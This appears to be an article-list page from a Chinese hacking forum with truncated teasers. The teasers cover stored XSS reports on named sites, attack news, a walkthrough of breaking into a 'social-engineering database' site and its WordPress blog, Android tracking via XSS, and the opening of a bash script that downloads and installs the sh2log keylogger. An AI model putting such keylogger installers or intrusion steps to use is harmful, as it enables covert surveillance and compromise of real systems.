文章列表
掌中英语(zzenglish.net)某应用 存储型XSS跨站漏洞 可盲打
掌中英语(zzenglish.net)某应用 存储型XSS跨站漏洞 可盲打
酷我音乐(kuwo.cn)某分站 存储型XSS跨站漏洞 可盲打
酷我音乐(kuwo.cn)某分站 存储型XSS跨站漏洞 可盲打
中国黑客被指利用IE发起网络攻击
中国黑客的常被国外的一些安全机构视为威胁对象,此类话题也常见于外媒报端,近日《华尔街日报》又报道称,三家美国安全公司指责,中国某精英黑客小组似乎是最近利用微软IE浏览器的安全漏洞“进行网络攻击”的发动者。报道称,这次的攻击在安全界内引发了格外的担忧,因为它暴露出世界上使用最多的软件
拿MYHACK社工库图解
截止发帖,已经搞坏了他的BLOG,博主如何看到了,只能说抱歉了,重新复制一份wp-include 下的 pluggable.php 即可,这里没录像,只有过程中的一部分截图,没技术可言,当水帖看吧1. 首先探测网站上有哪些信息,发现共两套程序,一套供数据查询的PHP框架 和 用wordpress搭建的BLOG2.使用工具wpscan扫描
帖子删除
帖子删除
【Love Python】【01】认识可爱的python
一,python特性概要 1,python是解释型语言,我们和c比较一下 root@GK:~# cat hello.c #include "stdio.h"int main(void){printf("hello t00ls \n");}root@GK:~# gcc hello.c -o helloroot@GK:~# ./hello hello t00ls root@GK:~# 每次修改源文件都要重新编译一下,python则不用root@GK:~# cat h
uc + xss 实现android远程定位追踪
1:前言 当PC时代的辉光逐渐隐入了暮霭,一轮更加炫目的红日正在缓缓升起,时至今日,移动互联网已经成为引领时代发展与前沿技术不断革新的中流砥柱,短短十数年间,手机的兴盛就超出了所有人的预料,大海淘沙,洗尽多少红尘铅华,新的思想,新的技术如雨后春笋般,让人目不暇接。智能化网络、云计算
自动安装sh2log键盘记录的脚本
关于sh2log参考 http://fuzzexp.org/linuxsh2log_keylogger.html其实sh2log是可以设置成发送到远端的服务器,实时监控键盘记录。具体可以参考源码中readme:#!/bin/bash###from tools.net#run the script as rootecho "installing sh2log "dlurl='http://packetstorm.foofus.com/UNIX/loggers/sh2log-1
2013中国互联网安全大会
为更好地应对互联网安全挑战,交流最新的安全技术与解决方案,国内规模最大的信息安全专业会议——2013中国互联网安全大会将于2013年9月23-25日在北京举行。此次大会由国家互联网应急中心指导,360公司主办, 得到网络安全应急技术国家工程实验室、OWASP、Gartner等知名机构的支持与深度参与,同时引入
攻击.CN域名黑客在青岛被抓
事件经过:25日凌晨零时左右,国家域名解析节点受到拒绝服务攻击,受到影响的涉及大量.cn域名网站。CNNIC当日约十点半左右发出通告称,经CNNIC处置,至2时许,服务恢复正常,凌晨3时通过官微发出通告。凌晨4时许,国家域名解析节点再次受到有史以来最大规模的拒绝服务攻击,部分网站解析受到影响,导致
